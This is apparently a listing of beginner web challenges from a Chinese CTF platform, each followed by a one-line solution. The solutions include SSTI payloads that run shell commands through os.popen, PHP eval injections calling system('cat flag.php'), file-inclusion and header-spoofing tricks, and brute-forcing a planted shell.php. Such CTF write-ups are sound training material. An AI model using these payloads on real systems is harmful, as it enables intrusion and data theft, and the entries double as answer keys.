为你找到 319 个题目。
68. [平台] 滑稽
分数: 10 金币: 1 已通过
通过: 29131 标签:
平台
WEB
writeup:
查看源码,搜索flag
69. [平台] 计算器
分数: 10 金币: 1 已通过
通过: 28941 标签:
平台
WEB
writeup:
修改input maxlength
70. [平台] GET
分数: 10 金币: 1 已通过
通过: 28045 标签:
平台
WEB
writeup:
/?what=flag
71. [平台] POST
分数: 10 金币: 1 已通过
通过: 23609 标签:
平台
WEB
writeup:
curl -d what=flag http://ip:port/
72. [平台] 矛盾
分数: 10 金币: 1 已通过
通过: 21507 标签:
平台
WEB
writeup:
/?num=1a
74. [平台] 你必须让他停下
分数: 10 金币: 1 已通过
通过: 20838 标签:
平台
WEB
writeup:
不停curl,知道出现10.jpg,flag就显示了
73. [平台] alert
分数: 10 金币: 1 已通过
通过: 19851 标签:
平台
WEB
writeup:
查看源码,复制那一串unicode字符串,用站长工具-unicode编码转换解码
203. [平台] Simple_SSTI_2
分数: 10 金币: 3 已通过
通过: 14983 标签:
平台
WEB
writeup:
SSTI模版注入: /?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}},
再 /?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
78. [平台] 网站被黑
分数: 15 金币: 2 已通过
通过: 14950 标签:
平台
WEB
writeup:
dirsearch 扫出来shell.php,再密码爆破,得到hack
77. [平台] 头等舱
分数: 15 金币: 1 已通过
通过: 14897 标签:
平台
WEB
writeup:
curl -I http://114.67.175.224:10352/
75. [平台] eval
分数: 15 金币: 1 已通过
通过: 14120 标签:
平台
WEB
writeup:
解法一:/?hello=file('flag.php') 解法二:/?hello=system('cat flag.php') 解法三:/?hello=show_source('flag.php')
79. [平台] 本地管理员
分数: 15 金币: 2 已通过
通过: 12497 标签:
平台
WEB
writeup:
页面源码,dGVzdDEyMw==,base64解码得到test123,hackbar提交,新增header,X-Forwarded-For: 127.0.0.1 ,payload pass=test123&user=admin
76. [平台] 变量1
分数: 15 金币: 1 已通过
通过: 12355 标签:
平台
WEB
writeup:
解法一:/?args=GLOBALS
204. [平台] Flask_FileUpload
分数: 10 金币: 3 已通过
通过: 11128 标签:
平台
WEB
writeup:
上传demo.jpg,内容为 import os\r\nos.system('cat /flag'),f12查看内容
81. [平台] 文件包含
分数: 20 金币: 2 已通过
通过: 10192 标签:
平台
WEB
writeup:
/index.php?file=file:///flag
80. [平台] 源代码
分数: 20 金币: 2 已通过
通过: 9693 标签:
平台
WEB
writeup:
查看页面源码,将p1/p2那部分编码进行解码,得到一个checkSubmit函数,复制67d709b2b54aa2aa648cf6e87a7114f1,提交得到flag